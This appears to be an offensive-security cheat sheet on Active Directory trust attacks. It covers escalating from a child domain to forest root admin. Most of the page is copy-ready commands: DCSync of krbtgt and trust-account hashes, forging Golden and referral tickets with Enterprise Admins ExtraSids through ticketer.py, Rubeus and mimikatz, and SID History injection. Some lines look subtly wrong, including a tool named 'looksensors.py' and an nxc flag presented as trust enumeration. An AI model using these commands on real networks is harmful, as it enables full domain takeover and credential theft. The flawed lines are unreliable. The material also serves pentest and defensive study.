AD Trust Attacks | KagisoSec

Ports

Port	Proto	Notes
`88`	tcp	Kerberos — trust ticket operations
`389`	tcp	LDAP — trust enumeration

Fingerprint

Trusts are visible in BloodHound's TrustedBy edges between Domain nodes
PowerView Get-DomainTrust enumerates all inbound/outbound trusts

Key files

Path	Holds	Sensitive
`krbtgt hash of child domain`	enables Golden ticket with ExtraSids for forest escalation	sensitive

Exploitation primitives

Child-to-parent escalation: child domain compromise → add Enterprise Admins SID (ExtraSids) → forest root DA
SID History abuse: Golden ticket with parent domain SID in SID history field
Cross-forest: only works if SID Filtering is disabled on the forest trust
Trust account password hash allows forging inter-domain referral tickets

Trust Enumeration

PowerView

# All domain trusts
Get-DomainTrust

# All forest trusts
Get-ForestTrust
Get-ForestDomain

# Trust from a specific domain
Get-DomainTrust -Domain child.domain.local

# Enumerate all trusts recursively
Get-DomainTrustMapping

BloodHound

# Find all trust relationships
MATCH (d1:Domain)-[r:TrustedBy]->(d2:Domain) RETURN d1.name, r, d2.name

# Trusts with specific direction
MATCH p=(d1:Domain {name: "CHILD.LOCAL"})-[:TrustedBy]->(d2:Domain) RETURN p

nxc / impacket

# Enumerate trusts via LDAP
nxc ldap DC_IP -u user -p pass --trusted-for-delegation

# List all domain trusts
looksensors.py -u user -p pass -d domain.local domain.local

Trust Terminology

Term	Meaning
Parent-Child	Automatic two-way transitive trust within a forest
Forest Trust	Between two separate AD forests
External Trust	Between domains in different forests (non-transitive)
Shortcut Trust	Manual trust between domains in the same forest
Transitive	Trust extends to all trusted domains of the trusted domain
One-way inbound	The trusting domain allows the trusted domain’s users
SID Filtering	Prevents cross-forest SID History injection

Child Domain → Parent Domain (ExtraSids)

The most common trust attack: compromise a child domain, then escalate to the forest root.

Requirements

krbtgt hash of the child domain
SID of the parent domain’s Enterprise Admins group
Child domain SID

Get required values

# Child krbtgt hash (DCSync from child DC)
mimikatz: lsadump::dcsync /domain:child.domain.local /user:krbtgt

# Child domain SID
Get-DomainSID -Domain child.domain.local

# Parent domain SID (to derive Enterprise Admins)
Get-DomainSID -Domain domain.local
# Enterprise Admins SID = Parent_SID + -519

# impacket
secretsdump.py -just-dc-user krbtgt child.domain.local/admin:pass@CHILD_DC_IP
lookupsid.py child.domain.local/user:pass@DC_IP | grep -i "enterprise admins"

Forge the cross-domain Golden ticket (ExtraSids)

# Impacket ticketer
ticketer.py \
  -nthash CHILD_KRBTGT_HASH \
  -domain-sid CHILD_DOMAIN_SID \
  -domain child.domain.local \
  -extra-sid PARENT_DOMAIN_SID-519 \
  -user-id 500 \
  Administrator

export KRB5CCNAME=Administrator.ccache

# DCSync the parent domain
secretsdump.py -k -no-pass -just-dc-ntlm domain.local/Administrator@PARENT_DC.domain.local

# Rubeus (Windows)
.\Rubeus.exe golden /rc4:CHILD_KRBTGT_HASH /domain:child.domain.local /sid:CHILD_SID /sids:PARENT_SID-519 /user:Administrator /ptt

# Mimikatz
kerberos::golden /user:Administrator /domain:child.domain.local /sid:CHILD_SID /krbtgt:CHILD_KRBTGT_HASH /sids:PARENT_SID-519 /ptt
misc::convert ccache Administrator.kirbi

SID History Abuse

If SID History is not filtered on a trust, inject another domain’s group SID into the sidHistory attribute of a user account:

# Add SID from parent domain to child user's SID history
# (requires DC access in child domain)
Get-DomainUser -Identity attacker | Select-Object -ExpandProperty sidhistory

# With mimikatz (requires DC SYSTEM / domain admin)
mimikatz: privilege::debug
mimikatz: sid::patch
mimikatz: sid::add /sam:attacker /new:PARENT_DOMAIN_SID-519

When the child domain user authenticates to the parent, the PAC includes the injected SID → treated as Enterprise Admin.

Cross-Forest Trust Attack (SID Filtering Disabled)

If the forest trust has SID Filtering disabled (quarantine = False), cross-forest SID History injection works:

# Check SID Filtering status
Get-DomainTrust | Select-Object * | Where-Object { $_.TrustAttributes -match "QUARANTINED" }
# If QUARANTINED not present = SID Filtering disabled

Attack:

Create a Golden ticket for the source forest with the target forest’s privileged group SID in extra-sids.
Access resources in the target forest.

Trust Account Password (Inter-Domain Referral Tickets)

Each trust relationship has a trust account in Active Directory. Compromise the trust account password to forge referral tickets.

# Get trust account hash via DCSync
secretsdump.py domain.local/admin:pass@DC_IP | grep "domain.local\$"

# Forge inter-domain referral ticket
ticketer.py \
  -nthash TRUST_ACCOUNT_HASH \
  -domain-sid SOURCE_SID \
  -domain source.domain.local \
  -spn krbtgt/TARGET.domain.local \
  Administrator

Enumeration: Checking for Attack Surface

# Identify all forest domains
Get-ForestDomain | Select Name

# Check trust direction and transitivity
Get-DomainTrust | Select SourceName, TargetName, TrustDirection, TrustType, TrustAttributes

# Find users with SID History
Get-DomainUser -LDAPFilter "(sidHistory=*)" | Select-Object samaccountname, sidhistory

# Cross-domain BloodHound collection
bloodhound-python -u user -p pass -d source.domain.local -ns DC_IP -c All --zip
# Repeat for target domain — upload both zips to see cross-forest paths

Notes

Intra-forest trusts (parent-child) are automatically transitive and not filtered — always exploitable if child domain is compromised.
Cross-forest trusts have SID Filtering enabled by default — ExtraSids won’t work unless filtering is explicitly disabled.
Always check TrustAttributes for TREAT_AS_EXTERNAL and QUARANTINED flags.